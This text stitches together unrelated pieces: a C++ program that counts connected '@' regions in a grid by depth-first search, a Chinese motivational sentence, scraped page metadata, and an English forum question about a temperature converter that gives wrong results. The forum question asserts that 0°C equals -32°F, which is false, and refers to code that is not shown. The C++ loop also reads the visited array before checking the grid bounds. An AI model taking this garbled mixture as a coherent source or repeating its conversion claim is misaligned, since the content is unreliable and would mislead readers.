#include<iostream> #include<cstdio> #include<cstring> #include<algorithm> #include<cmath> using namespace std; int n,m; char s[110][110]; int xx[]={0,0,1,-1,1,-1,-1,1}; int yy[]={1,-1,0,0,1,-1,1,-1}; int x,y; int vis[110][110]; void dfs(int x,int y) { vis[x][y]=1; for(int i=0;i<8;i++){ int dx=x+xx[i]; int dy=y+yy[i]; if(!vis[dx][dy]&&dx>=0&&dx<n&&dy>=0&&dy<m&&s[dx][dy]=='@'){ dfs(dx,dy); } } return ; } int main() { while(scanf("%d %d",&n,&m)){ memset(vis,0,sizeof(vis)); if(m==0)break; for(int i=0;i<n;i++){ scanf("%s",s[i]); } //getchar(); //for(int i=0;i<n;i++){ //getline(cin,s[i]); //} int ans=0; for(int i=0;i<n;i++){ for(int j=0;j<m;j++){ if(!vis[i][j]&&s[i][j]=='@'){ dfs(i,j); ans++; } } } printf("%d\n",ans); } return 0; }你的努力,也许有人会讥讽;你的执着,也许不会有人读懂。在别人眼里你也许是小丑,在自己心中你就是国王。好好努力相信自己,不比别人差。 | https://www.codetd.com/article/561062 | CC-MAIN-2020-10 | refinedweb | 268 | 60.75 |
5 minutes ago,cbae wrote
*snip*
I don't know how you can say that. All of the sample C# code that I saw in the keynote had .NET namespace references, as far as I could tell. Maybe those namespaces weren't technically part of the .NET framework, but as long as you're using C# and can bind data to UI elements using XAML mark-up, who really cares?
They said that they went to great lengths to get WinRT namespaces to match .NET namespaces so that apps wouldn't need too many changes. I'm sure we'll learn a lot more at the WinRT session, but .NET was not mentioned once, only the languages were (C#/VB/XAML). Right now it seems that WinRT is a native wrapper around Win32, almost like an updated MFC. | http://channel9.msdn.com/Forums/Coffeehouse/Build-The-Discussion/1a5928c291844e298cc99f5d015d2992 | CC-MAIN-2014-52 | refinedweb | 138 | 83.86 |
11 min read
With approximately one billion people using Microsoft Office, the DOCX format is the most popular de facto standard for exchanging document files between offices. Its closest competitor - the ODT format - is only supported by Open/LibreOffice and some open source products, making it far from standard. The PDF format is not a competitor because PDFs can’t be edited and they don’t contain a full document structure, so they can only take limited local changes like watermarks, signatures, and the like. This is why most business documents are created in the DOCX format; there’s no good alternative to replace it.
While DOCX is a complex format, you may want to parse it manually for simpler tasks such as indexing, converting to TXT and making other small modifications. I’d like to give you enough information on DOCX internals so you don’t have to reference the ECMA specifications, a massive 5,000 page manual.
The best way to understand the format is to create a simple one-word document with MSWord and observe how editing the document changes the underlying XML. You’ll face some cases where the DOCX doesn’t format properly in MS Word and you don’t know why, or come across instances when it’s not evident how to generate the desired formatting. Seeing and understanding exactly what’s going on in the XML will help that.
I worked for about a year on a collaborative DOCX editor, CollabOffice, and I want to share some of that knowledge with the developer community. In this article I will explain the DOCX file structure, summarising information that is scattered over the internet. This article is an intermediary between the huge, complex ECMA specification and the simple internet tutorials currently available. You can find the files that accompany this article in the
toptal-docx project on my github account.
A Simple DOCX file
A DOCX file is a ZIP archive of XML files. If you create a new, empty Microsoft Word document, write a single word ‘Test’ inside and unzip it contents, you will see the following file structure:
Even though we’ve created a simple document, the save process in Microsoft Word has generated default themes, document properties, font tables, and so on, in XML format.
To start, let us remove the unused stuff and focus on
document.xml, which contains the main text elements. When you delete a file, make sure you have deleted all the relationship references to it from other the xml files. Here is a code-diff example on how I’ve cleared dependencies to app.xml and core.xml. If you have any unresolved/missing references, MSWord will consider the file broken.
Here’s the structure of our simplified, minimal DOCX document (and here’s the project on github):
Let’s break it down by file from here, from the top:
_rels/.rels
This defines the reference that tells MS Word where to look for the document contents. In this case, it references
word/document.xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns=""> <Relationship Id="rId1" Type="" Target="word/document.xml"/> </Relationships>
_rels/document.xml.rels
This file defines references to resources, such as images, embedded in the document content. Our simple document has no embedded resources, so the relationship tag is empty:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns=""> </Relationships>
[Content_Types].xml
[Content_Types].xml contains information about the types of media inside the document. Since we only have text content, it’s pretty simple:
<>
document.xml
Finally, here is the main XML with the document’s text content. I have removed some of namespace declarations for clarity, but you can find the full version of the file in the github project. In that file you’ll find that some of the namespace references in the document are unused, but you shouldn’t delete them because MS Word needs them.
Here’s our simplified example:
<w:document> <w:body> <w:p w: <w:r><w:t>Test</w:t></w:r> </w:p> <w:sectPr w:rsidR="005F670>
The main node
<w:document> represents the document itself,
<w:body> contains paragraphs, and nested within
<w:body> are page dimensions defined by
<w:sectPr>.
<w:rsidR> is an attribute that you can ignore; it’s used by MS Word internals.
Let’s take a look at a more complex document with three paragraphs. I have highlighted the XML with the same colors on the screenshot from Microsoft Word, so you can see the correlation:
<w:p w: <w:r> <w:t xml:This is our example first paragraph. It's default is left aligned, and now I'd like to introduce</w:t> </w:r> <w:r> <w:rPr> <w:rFonts w: <w:color w: </w:rPr> <w:t>some bold</w:t> </w:r> <w:r> <w:rPr> <w:rFonts w: <w:b/> <w:color w: </w:rPr> <w:t xml: text</w:t> </w:r> <w:r> <w:rPr> <w:rFonts w: <w:color w: </w:rPr> <w:t xml:, </w:t> </w:r> <w:proofErr w: <w:r> <w:t xml:and also change the</w:t> </w:r> <w:r w: <w:rPr><w:rFonts w: </w:rPr> <w:t>font style</w:t> </w:r> <w:r> <w:rPr> <w:rFonts w: </w:rPr> <w:t xml: </w:t> </w:r> <w:r> <w:t>to 'Impact'.</w:t></w:r> </w:p> <w:p w: <w:r> <w:t>This is new paragraph.</w:t> </w:r></w:p> <w:p w: <w:r> <w:t>This is one more paragraph, a bit longer.</w:t> </w:r> </w:p>
Paragraph Structure
A simple document consists of paragraphs, a paragraph consists of runs (a series of text with the same font, color, etc), and runs consist of characters (such as
<w:t>).
<w:t> tags may have several characters inside, and there might be a few in the same run.
Again, we can ignore
<w:rsidR>.
Text properties
Basic text properties are font, size, color, style, and so on. There are about 40 tags that specify text appearance. As you can see in our three paragraph example, each run has its own properties inside
<w:rPr>, specifying
<w:color>,
<w:rFonts> and boldness
<w:b>.
An important thing to note is that properties make a distinction between the two groups of characters, normal and complex script (Arabic, for instance), and that the properties have a different tag depending on which type of character it’s affecting.
Most normal script property tags have a matching complex script tag with an added “C” specifying the property is for complex scripts. For example:
<w:i> (italic) becomes
<w:iCs>, and the bold tag for normal script,
<w:b>, becomes
<w:bCs> for complex script.
Styles
There’s an entire toolbar in Microsoft Word dedicated to styles: normal, no spacing, heading 1, heading 2, title, and so on. These styles are stored in
/word/styles.xml (note: in the first step in our simple example, we removed this XML from DOCX. Make a new DOCX to see this).
Once you have text defined as a style, you will find reference to this style inside the paragraph properties tag,
<w:pPr>. Here’s an example where I’ve defined my text with the style Heading 1:
<w:p> <w:pPr> <w:pStyle w: </w:pPr> <w:r> <w:t>My heading 1</w:t> </w:r> </w:p>
and here is the style itself from
styles.xml:
<w:style w: <w:name w: <w:basedOn w: <w:next w: <w:link w: <w:uiPriority w: <w:qFormat/> <w:rsid w: <w:pPr> <w:keepNext/> <w:keepLines/> <w:spacing w: <w:outlineLvl w: </w:pPr> <w:rPr> <w:rFonts w: <w:b/> <w:bCs/> <w:color w: <w:sz w: <w:szCs w: </w:rPr> </w:style>
The
<w:style/w:rPr/w:b> xpath specifies that the font is bold, and
<w:style/w:rPr/w:color> indicates the font color.
<w:basedOn> instructs MSWord to use “Normal” style for any missing properties.
Property Inheritance
Text properties are inherited. A run has its own properties (
w:p/w:r/w:rPr/*), but it also inherits properties from paragraph (
w:r/w:pPr/*), and both can reference style properties from the
/word/styles.xml.
<w:r> <w:rPr> <w:rStyle w: <w:sz w: </w:rPr> <w:tab/> </w:r>
Paragraphs and runs start with default properties:
w:styles/w:docDefaults/w:rPrDefault/*
and
w:styles/w:docDefaults/w:pPrDefault/*. To get the end result of a character’s properties you should:
- Use default run/paragraph properties
- Append run/paragraph style properties
- Append local run/paragraph properties
- Append result run properties over paragraph properties
When I say “append” B to A, I mean to iterate through all B properties and override all A’s properties, leaving all non-intersecting properties as-is.
One more place where default properties may be located is in the
<w:style> tag with
w:type="paragraph" and
w:default="1". Note, that characters themselves inside a run never have a default style, so
<w:style w: doesn’t actually affect any text.
Toggle properties
Some of the properties are “toggle” properties, such as
<w:b> (bold) or
<w:i> (italic); these attributes behave like an XOR operator.
This means if the parent style is bold and a child run is bold, the result will be regular, non-bold text.
You have to do lots of testing and reverse-engineering to handle toggle attributes correctly. Take a look at paragraph 17.7.3 of ECMA-376 Open XML specification to get the formal, detailed rules for toggle properties/
Fonts
Fonts follow the same common rules as other text attributes, but font property default values are specified in a separate theme file, referenced under
word/_rels/document.xml.rels like this:
<Relationship Id="rId7" Type="" Target="theme/theme1.xml"/>
Based on the above reference, the default font name will be found in
word/theme/themes1.xml, inside a
<a:theme> tag,
a:themeElements/a:fontScheme/a:majorFont or
a:minorFont tag.
The default font size is 10 unless the
w:docDefaults/w:rPrDefault tag is missing, then it is size 11.
Text alignment
Text alignment is specified by a
<w:jc> tag with four
w:val modes available:
"left",
"center",
"right" and
"both".
"left" is the default mode; text is started at the left of paragraph rectangle (usually the page width). (This paragraph is aligned to the left, which is standard.)
"center" mode, predictably, centers all characters inside the page width. (Again, this paragraph exemplifies centered alignment.)
In
"right" mode, paragraph text is aligned to the right margin. (Notice how this text is aligned to the right side.)
"both" mode puts extra spacing between words so that lines get wider and occupy the full paragraph width, with the exception of the last line which is left aligned. (This paragraph is a demonstration of that.)
Images
DOCX supports two sorts of images: inline and floating.
Inline images appear inside a paragraph along with the other characters,
<w:drawing> is used instead of using
<w:t> (text). You can find image ID with the following xpath syntax:
w:drawing/wp:inline/a:graphic/a:graphicData/pic:pic/pic:blipFill/a:blip/@r:embed
The image ID is used to look up the filename in the
word/_rels/document.xml.rels file, and it should point to gif/jpeg file inside word/media subfolder. (See the github project’s
word/_rels/document.xml.rels file, where you can see the image ID.)
Floating images are placed relative to paragraphs with text flowing around them. (Here’s th github project sample document with a floating image.)
Floating images use
<wp:anchor> instead of
<w:drawing>, so if you delete any text inside
<w:p>, be careful with the anchors if you don’t want the images removed.
Tables
XML tags for tables are similar to HTML table markup–
<w:tbl>, the table itself, has table properties
<w:tblPr>, and each column property is presented by
<w:gridCol> inside
<w:tblGrid>. Rows follow one by one as
<w:tr> tags and each row should have same number of columns as specified in
<w:tblGrid>:
<w:tbl> <w:tblPr> <w:tblW w: </w:tblPr> <w:tblGrid><w:gridCol/><w:gridCol/></w:tblGrid> <w:tr> <w:tc><w:p><w:r><w:t>left</w:t></w:r></w:p></w:tc> <w:tc><w:p><w:r><w:t>right</w:t></w:r></w:p></w:tc> </w:tr> </w:tbl>
Width for table columns can be specified in the
<w:tblW> tag, but if you don’t define it MS Word will use its internal algorithms to find the optimal width of columns for the smallest effective table size.
Units
Many XML attributes inside DOCX specify sizes or distances. While they’re integers inside the XML, they all have different units so some conversion is necessary. The topic is a complicated one, so I’d recommend this article by Lars Corneliussen on units in DOCX files. The table he presents is useful, though with a small misprint: inches should be pt/72, not pt*72.
Here’s a cheat sheet:
Tips for Implementing a Layouter
If you want to convert a DOCX file (to PDF, for instance), draw it on canvas, or count number of pages, you’ll have to implement a layouter. A layouter is an algorithm for calculating character positions from a DOCX file.
This is a complex task if you need 100 percent fidelity rendering. The amount of time needed to implement a good layouter is measured in man-years, but if you only need a simple, limited one, it can be done relatively quickly.
A layouter fills a parent rectangle, which is usually a rectangle of the page. It add words from a run one by one. When the current line overflows, it starts a new one. If the paragraph is too high for the parent rectangle, it’s wrapped to the next page.
Here are some important things to keep in mind if you decide to implement a layouter:
- The layouter should take care about text alignment and text floating over images
- It should be capable of handling nested objects, such as nested tables
- If you want to provide full support for such images, you’ll have to implement a layouter with at least two passes, the first step collects floating images’ positions and the second fills empty space with text characters.
- Be aware of indentations and spacings. Each paragraph has spacing before and after, and these numbers are specified by the
w:spacingtag. Vertical spacing is specified by
w:afterand
w:beforetags. Note that line spacing is specified by
w:line, but this is not the size of the line as one may expect. To get the size of the line, take the current font height, multiply by
w:lineand divide by 12.
- DOCX files contain no information about pagination. You won’t find the number of pages in the document unless you calculate how much space you need for each line to ascertain the number of pages. If you need to find exact coordinates of each character on the page, be sure to take into account all spacings, indentations and sizes.
- If you implement a full-featured DOCX layouter that handles tables, note the special cases when tables span multiple pages. A cell which causes a page overflow also affects other cells.
- Creating an optimal algorithm for calculating a table columns’ width is a challenging math problem and word processors and layouters usually use some suboptimal implementations. I propose using the algorithm from W3C HTML table documentation as a first approximation. I haven’t found a description of the algorithm used by MS Word, and Microsoft has fine-tuned the algorithm over time so different versions of Word may lay out tables slightly differently.
If something is unclear: reverse-engineer the XML!
When it’s not obvious how this or that XML tag works inside MS Word, there are two main approaches to figuring it out:
Create the desired content step-by-step. Start with a simple docx file. Save each step to its own file, as in
1.docx,
2.docx, for example. Unzip each of them and use a visual diff tool for folder comparison to see which tags appear after your changes. (For a commercial option, try Araxis Merge, or for a free option, WinMerge.)
If you generate a DOCX file that MS Word doesn’t like, work backwards. Simplify your XML step by step. At some point you will learn which change MS Word found incorrect.
DOCX is quite complex, isn’t it?
It is complex, and Microsoft’s license forbids using MS Word on the server side for processing DOCX– this is pretty standard for commercial products. Microsoft has, however, provided the XSLT file to handle most DOCX tags, but it won’t give you 100 percent or even 99 percent fidelity. Processes such as text wrapping over images are not supported, but you will be able to support the majority of documents. (If you don’t need complexity, consider using Markdown as an alternative.)
If you have a sufficient budget (there is no free DOCX rendering engine), you may want to use commercial products such as Aspose or docx4j. The most popular free solution is LibreOffice for converting between DOCX and other formats, including PDF. Unfortunately, LibreOffice contains many small bugs during conversion, and since it’s a sophisticated, open-source C++ product, it’s slow and difficult to fix fidelity issues.
Alternatively, if you find DOCX layouting too complicated to implement yourself, you can also convert it to HTML and use a browser to render it. You can also consider one of Toptal’s freelance XML developers.
DOCX Resources for further reading
- ECMA DOCX specification
- OpenXML library for DOCX manipulation from C#. It doesn’t contain information on layouting or rendering code, but offers a class hierarchy matching each possible XML node in DOCX.
- You can always search or ask on stackoverflow with keywords like docx4j, OpenXML and docx; there are people in the community who are knowledgeable. | https://www.toptal.com/xml/an-informal-introduction-to-docx | CC-MAIN-2019-04 | refinedweb | 3,060 | 61.26 |
MThomas left a reply on Laracast Post Time Issue
I remember informing @jeffreyway about this early on but it still has not changed. Guess something is wrong with the timezone offset calculations :)
Now I start wondering if there is also a time issue with the time estimate in scheduled videos.
Wondering when: will get online. Here it states 35 minutes from now (14:25 UTC+2 - Amsterdam).
MThomas left a reply on How/Where Should I Code A Dropdown List
I think the best advice I can give you is start with a series like:
Next move on to series like: or the more recent
I’m fairly sure that these series will get you up to speed on how to use Laravel as it is designed.
Good luck!
MThomas left a reply on Casts
Casts can be used to convert (cast) a JSON string to a native array, or a MySQL boolean (TINYINT) to a PHP boolean (true/false).
In order to prevent users from entering invalid data, you need to validate the user's input.
On a side note, you should never store or handle phone numbers as integers; this will get you in trouble:
And remember that PHP does not play nice with long integers
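Conceptually, a cast is just a conversion applied when an attribute is read. Here is a stripped-down, plain-PHP sketch of that idea (this is not Eloquent's actual implementation; in a real model you would simply declare `protected $casts = ['is_admin' => 'boolean', 'options' => 'array'];`):

```php
<?php
// Plain-PHP sketch of attribute casting. Eloquent does the real work
// internally; this only illustrates the conversion step.
class TinyModel
{
    // Same shape as Eloquent's $casts property
    protected $casts = [
        'is_admin' => 'boolean',
        'options'  => 'array',
    ];

    protected $attributes = [];

    public function __construct(array $raw)
    {
        // Raw values as they would come out of the database
        $this->attributes = $raw;
    }

    public function get(string $key)
    {
        $value = $this->attributes[$key] ?? null;

        switch ($this->casts[$key] ?? null) {
            case 'boolean':
                return (bool) $value;             // TINYINT "1"/"0" -> true/false
            case 'array':
                return json_decode($value, true); // JSON string -> native array
            default:
                return $value;                    // no cast defined
        }
    }
}

$model = new TinyModel(['is_admin' => '1', 'options' => '{"theme":"dark"}']);
var_dump($model->get('is_admin')); // bool(true)
var_dump($model->get('options'));  // native array with ['theme' => 'dark']
```

Note that casts only change how values are read back; they do nothing to stop bad input, which is why validation is still needed.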
MThomas left a reply on Urgent Whoops
@pdc why open a 2 year old post for these kinds of discussions...
If you so strongly believe that Laravel is an insecure framework, show some evidence, file security reports or issues on GitHub instead of complaining... nobody here forces you to use it.
On the topic of Whoops: by default Laravel disables Whoops for production... you have to enable it manually in order for it to show on production.
MThomas left a reply on Vue.js (Laravel + Vue) Not Working On IPhone.
Please elaborate on the issue...
What response do you get? Is it a Laravel issue? Have you tried turning on Debug Mode?
MThomas left a reply on How To Create Recursive Route?
This package might be of use:
MThomas left a reply on AssertSee Videos?
Great you got it to work!
As a rule of thumb, if you run into an issue, share the code you are working on: in this case the test method, the controller action, etc. :)
Good luck!
MThomas left a reply on 401 Unauthenticated In Ajax Login...
If you want us to help you, show us the code you have written, what routes you have defined etc.
A 404 means that it can't find the requested URL, so that might be a starting point for your debugging.
MThomas left a reply on AssertSee Videos?
As far as I know you can assert the response contains a certain HTML string using assertSee().
And please realize and accept(!) that you need to provide the forum with information; we don't know what you want. Only in your last post did you mention the use of YouTube and iframes; prior to that, it could have been a Laravel model, etc...
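Under the hood, assertSee() essentially checks that the given string (escaped by default) occurs in the response body. A plain-PHP sketch of that check (not Laravel's actual implementation; in a real feature test you'd write something like `$this->get('/videos/1')->assertSee('youtube.com/embed/abc123', false);` — the route and markup below are made up):

```php
<?php
// Minimal stand-in for what assertSee() verifies:
// substring presence in the rendered HTML.
function contains(string $html, string $needle): bool
{
    return strpos($html, $needle) !== false;
}

// Hypothetical response body for a page embedding a YouTube iframe
$html = '<iframe src="https://www.youtube.com/embed/abc123"></iframe>';

var_dump(contains($html, 'youtube.com/embed/abc123')); // bool(true)
var_dump(contains($html, 'vimeo.com'));                // bool(false)
```

Keep in mind that assertSee() escapes the expected value by default, so when asserting raw HTML like an iframe tag you typically pass false as the second argument to disable escaping.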
MThomas left a reply on Authentication In An SPA
What about
And if the default drivers don't cover your use case you can find many others here:
And if you want to add your own OAuth server, take a look at
MThomas left a reply on Dynamically Create Subdomain
I guess the best way to find out is to give it a try.
But as you need to record the subdomain somewhere, there is no reason you could not redirect there (it's nothing more than a regular redirect).
MThomas left a reply on How Can I Use Pagination In Laravel Vuejs?
Just the first two Google results for laravel vue pagination:
In other words, what did you try, where did you get stuck?
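To get unstuck it helps to see how little paginate() actually does: an offset/limit slice plus a total count. A plain-PHP sketch of the math (in Laravel you'd just call `Post::paginate(15)` and feed the resulting JSON to your Vue component; the field names below mirror Laravel's paginator output):

```php
<?php
// Plain-PHP sketch of offset/limit pagination; not Laravel's implementation.
function paginate(array $items, int $page, int $perPage): array
{
    $total = count($items);

    return [
        // Items for the requested page: skip (page - 1) * perPage, take perPage
        'data'         => array_slice($items, ($page - 1) * $perPage, $perPage),
        'total'        => $total,
        'per_page'     => $perPage,
        'current_page' => $page,
        'last_page'    => (int) ceil($total / $perPage),
    ];
}

$result = paginate(range(1, 23), 2, 10);
// Page 2 of 23 items at 10 per page -> items 11..20, 3 pages in total
```

In a real app the slice and count are done in SQL (LIMIT/OFFSET plus a COUNT query), which is exactly what paginate() generates for you.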
MThomas left a reply on Dynamically Create Subdomain
Sounds like a multi-tenant approach might help you. This will also enable you to isolate all tenant/company data in separate databases or tables.
Take a look at or for composer packages doing the heavy lifting.
If you'd like to do it yourself, take a look at these two great blog posts:
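Whichever package you pick, tenant identification boils down to pulling the subdomain out of the request host and looking the tenant up. A plain-PHP sketch of just that step (domain names are made up; the packages above handle this — and the per-tenant database switching — for you):

```php
<?php
// Extract the tenant subdomain from a host name, given the app's base domain.
function tenantFromHost(string $host, string $baseDomain): ?string
{
    // The bare base domain itself has no tenant (e.g. "example.com")
    if ($host === $baseDomain) {
        return null;
    }

    $suffix = '.' . $baseDomain;
    if (substr($host, -strlen($suffix)) !== $suffix) {
        return null; // host does not belong to our base domain at all
    }

    // "acme.example.com" -> "acme"
    return substr($host, 0, -strlen($suffix));
}

var_dump(tenantFromHost('acme.example.com', 'example.com')); // string "acme"
var_dump(tenantFromHost('example.com', 'example.com'));      // NULL
```

In Laravel you'd typically run this kind of lookup in middleware (or use the route-level `{tenant}.example.com` domain parameter) and then switch the database connection for the resolved tenant.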
MThomas left a reply on Route [admin.categories.index] Not Defined.
Your namespace and file path are connected :).
If it solved your issue, please mark it as the answer, that helps others.
MThomas left a reply on Connection Could Not Be Established With Host Smtp.mailtrap.io [Connection Refused #111]
Two things: first, please tell us what you did and show us the code that sends the email.
Secondly, you exposed your Mailtrap SMTP/API username and password; it might be best to remove them from the post and renew them on Mailtrap's side.
MThomas left a reply on Route [admin.categories.index] Not Defined.
What is the path of your controller?
It should be in app/Http/Controllers/Auth/Admin.
MThomas left a reply on Route [admin.categories.index] Not Defined.
Within the route group you prefix all controllers with ‘Auth/Admin’, but your CategoriesController is just in App/Http/Controllers and not in App/Http/Controllers/Auth/Admin.
So if you want it to work, move the file to the Admin directory and update the namespace accordingly.
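In practice the connection looks like this — a hypothetical sketch of the route group from the thread, plus the file path the namespace implies under PSR-4:

```php
<?php
// routes/web.php (sketch): the group namespace is appended to the
// controllers root, so Laravel resolves
// App\Http\Controllers\Auth\Admin\CategoriesController.
//
// Route::group(['namespace' => 'Auth\Admin', 'prefix' => 'admin'], function () {
//     Route::resource('categories', 'CategoriesController');
// });

// PSR-4 makes the file path follow the namespace:
function controllerPath(string $groupNamespace, string $controller): string
{
    $fqcn = 'App\\Http\\Controllers\\' . $groupNamespace . '\\' . $controller;

    // App\ maps to app/, and namespace separators become directory separators
    return str_replace(['App\\', '\\'], ['app/', '/'], $fqcn) . '.php';
}

echo controllerPath('Auth\\Admin', 'CategoriesController');
// app/Http/Controllers/Auth/Admin/CategoriesController.php
```

So when a route references Auth\Admin\CategoriesController, the class file has to live at exactly that path — which is why moving the file and updating its namespace fixes the "route not defined" error.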
MThomas left a reply on Variable Not Passing To View
What URL are you visiting? How did you install Laravel? Are you using Homestead or Valet?
MThomas left a reply on Conditional Filtering On Related Model
@andersb Not sure what you're asking. You said that if there is a post, you would like to get all comments, not just the comments of the post you're viewing; that is what that query does: it only uses the timestamp of the post the user is viewing.
If the user is not viewing a post, but you just want comments that are a month old, isn't it just this:
MThomas left a reply on Get Data From 3 Tables With Relationship Laravel
@ABDULBAZITH - As mentioned in my earlier comment, you need to create the relationships on your models. The comments show you don't have the following relationships:
// In your order model
public function products()
{
    return $this->hasMany(Product::class);
}

// In your product model
// Or "type" is even better, but then you need to update the Eloquent query accordingly
public function product_type()
{
    return $this->belongsTo(ProductType::class);
}
MThomas left a reply on Conditional Filtering On Related Model
Not sure if I get it right, but isn't it as simple as:
$post = Post::find(123);
// copy() prevents addMonth() from mutating the model's own timestamp
$comments = Comment::whereDate('created_at', '>', $post->created_at->copy()->addMonth());
MThomas left a reply on Hoping For Pointers On CRUD Logging...
OK, I get your point. Can you explain why you want to do that? In the case you mention, you could easily resolve the Country's name based on its ID.
I'm not entirely sure why you want to log for example that piece of data. Just thinking out of the box and filling in some information. But in case you try to log: "MThomas (Netherlands) updated his profile", you could do something like this:
activity()
    ->performedOn($user)
    ->causedBy(auth()->user())
    ->withProperties(['country_id' => $user->country_id])
    ->log("{$user->name} ({$user->country->name}) updated his profile.");
If this is not the case, let me try a different idea (have not tested or tried this). Assuming there is not an endless list of fields from related models you'd like to log. Why not create an accessor attribute for the item you like to log, and add it to the luggable attributes:
use Illuminate\Database\Eloquent\Model; use Spatie\Activitylog\Traits\LogsActivity; class User extends Model { use LogsActivity; protected $guarded = [*]; protected static $logAttributes = ['name', 'country']; protected static $logOnlyDirty = true; // Only log created and changed fields public function country() { return $this->belongsTo(Country::class); } public function getCountryAttribute() { $this->country->name; } }
MThomas left a reply on Get Data From 3 Tables With Relationship Laravel
Why not use the GroupBy functionality of Eloquent, assuming your Order model has a product relationship and your Product model a product_type relationship.
Order::with(['product.product_type' => function($query){ $query->groupBy('id'); }])->get();
MThomas left a reply on Hoping For Pointers On CRUD Logging...
The package will log all or a selection of fields for models (that have a certain trait and implementation) every time you create or update the model. So if you add the trait to all models you want to track, you should be fine.
Yes, you might log more that you need, but you could create a artisan job that deletes unnecessary logged items or something like it (if it is really a problem). Otherwise using a standard package that fits 80% of your need vs the downside of building and maintaining your own implementation might not weigh up.
MThomas left a reply on Azure AD Authentication In My Laravel Web App
MThomas left a reply on Hoping For Pointers On CRUD Logging...
Is the thing you are looking for? You should be able to use v1.
MThomas left a reply on Azure AD Authentication In My Laravel Web App
Any reason you're not using on of the Azure AD packages? For example? -- Extension of Socialite -- Based on middleware
MThomas left a reply on Is There A Way To List All Relationships Of A Model?
MThomas left a reply on Check If Model Has Changed Since First Save
Not build in (as far as I know). But I can highly recommend this package by Spatie:
it enables you to track changes for specified attributes.
MThomas left a reply on Open A Register Form Only In Sunday
MThomas left a reply on Open A Register Form Only In Sunday
Even more elegant is:
if(now()->->isSunday()) { return view('foo.bar'); }
You leverage Carbon and the Laravel helper which makes it even more expressive.
MThomas left a reply on Select Inputs Ignored By Validation
Are you sure your request data includes the field?
Try a
return $request->all() before validating to check it is in your request data.
If you want to include user input in your validated data array, you can add it without any rules:
'email' => 'required|email', 'data_not_validated' => '',
If you want to manually add something to a create method you could do this:
$data = $request->validate([ // 'email' => ['required', 'email'], // ]); $data['foo'] = 'bar'; $model = Post::create($data);
MThomas left a reply on Select Inputs Ignored By Validation
You could use ‘required|in:male,female’
MThomas left a reply on How To Install This IBAN Validator In LARAVEL
Why not use this package:
This is tailormade for Laravel.
MThomas left a reply on Role-based Multi-tenant With Tenant Subscription To Selected Features
Yes, the can directive can limit access to resources, and you can also scope queries down to the teams (could even add a global scope for this).
With regard to the subscriptions. You could add that functionality to the team model instead of the user model.
MThomas left a reply on Role-based Multi-tenant With Tenant Subscription To Selected Features
You should take a look at this works great with Laravels permission system.
And as you said, combine it with Laravel cashier and you will have the most flexible integration you can wish for.
Just asign users roles and teams, and link permissions to roles and teams. You could use the Laravel's gate/authorization features to check the acces to a certain resource based on there presence in a team.
MThomas left a reply on Thoughts On Subscribing To Laracasts?
If you are still in doubt, why not register for a monthly subscription and find out yourself. I found I extremely useful, and if you take a look around at the forum and the users badges, you will see there are very experienced developers and juniors here. For everyone there will be something useful.
MThomas left a reply on How Can I Hide Or Remove Id From Url In Laravel?
Take a look at this package, will leverage a lot of work for you:
MThomas left a reply on How To Configure Laravel Passport's '/oauth/token' Rate Limit?
Isn't this what you are looking for:
Route::middleware('auth:api', 'throttle:60,1')->group(function () { Route::get('/user', function () { // }); });
MThomas left a reply on CORS Issue Only On Axios
This package might help you:
MThomas left a reply on VUE.js | Reload Page On External Server After Update.
You need to inform the client (that is where the JavaScript is rendered) that it needs to refresh. You can do this using Broadcasting in Laravel. You’ll need a service like Pusher or Laravel-Websockets to make it work.
Those are needed to establish a connection from the client to your server in order to push an update without a trigger from the user.
An totally different option is to reload the page (or perform an Ajax request) every x seconde or minutes to your server.
MThomas left a reply on Task Scheduling Runs Every Minute Despite My Directions
The idea is that the cron job is called every minute. And that you set the timeframe/interval on your jobs. If there is no job set in your code base for the moment the cronjob runs, no jobs will be executed. If there is a job set in the codebase for that moment, it will run.
Or have I completely missunderstood your problem?
MThomas left a reply on Differents Between Eloquent ORM And Query Builder?
They are linked. Eloquent lets you use models to query your database. The query builder is what is used under the hood in Eloquent. And you can use) to query your database directely and build upon eloquent queries.
MThomas left a reply on Laravel 5.8 Does Not Use Sqlite For Testing
Did you install Laravel Telescope? If so, you need to be sure you have the line below in your
phpunit.xml:
<env name="TELESCOPE_ENABLED" value="false" />
Somehow having telescope enabled while running tests causes an .env problem.
MThomas left a reply on Data Is Not Deleting In Laravel
Did you use the Vue component structure and compiled it down?
<template> <a href="#" @ <i class="fa fa-trash red"></i> </a> </template> <script> export default { data() { return { } }, methods: { deleteUser(id){ Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert this!", type: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { //send request to the server this.form.delete('api/user/'+id).then(()=>{ Swal.fire( 'Deleted!', 'Your file has been deleted.', 'success' ) }).catch(()=>{ swal("Failed!", "There was something worng.", "warning"); }); }) }, } mounted() { console.log('Component mounted.') } } </script>
MThomas left a reply on Logout In Laravel Not Working
What did you change? Did you do something with the authentication routes, did you change the logic in the auth scaffold? It must be there since your code seems very similar to the default code in app.blade.php
<div class="dropdown-menu dropdown-menu-right" aria- <a class="dropdown-item" href="{{ route('logout') }}" onclick="event.preventDefault(); document.getElementById('logout-form').submit();"> {{ __('Logout') }} </a> <form id="logout-form" action="{{ route('logout') }}" method="POST" style="display: none;"> @csrf </form> </div>
Or try reverting back to the code above, the one that is provided in the default
layout/app.blade.php file :)
MThomas left a reply on Bulk Delete Of Records Where SoftDeletes Is True
MThomas left a reply on Bulk Delete Of Records Where SoftDeletes Is True
You don't have to pas the delete in
forceDelete, you are already in the context of the delete...
You could change the inside of your loop to chain the
forceDelete method:
Post::where('id', $post)->forceDelete();
And assuming that
$post is an single ID and
$postsToDelete an array of ID's instead of the loop you could do:
Post::whereIn('id',$postsToDelete)->forceDelete();
MThomas left a reply on Getting Relation's Related Fields In Laravel Eloquent Model
use
qty_prices() instead. You need the query builder for the
with() method :)
$this->qty_prices will give you a collection of all the related prices.
$this->qty_prices() will return a query builder object that you can build upon with Eloquent methods like
with() | https://laracasts.com/@MThomas | CC-MAIN-2019-39 | refinedweb | 2,691 | 61.67 |
I am pretty sure my math is correct, but for some reason my variable seems to be holding old values?
If some one would be so kind enough to run this code they will see.
My first few conversions work great ie; 0c = -32f, 212f = 100c
How ever 100c = 68f is definatley wrong
Any help would be appreciated.
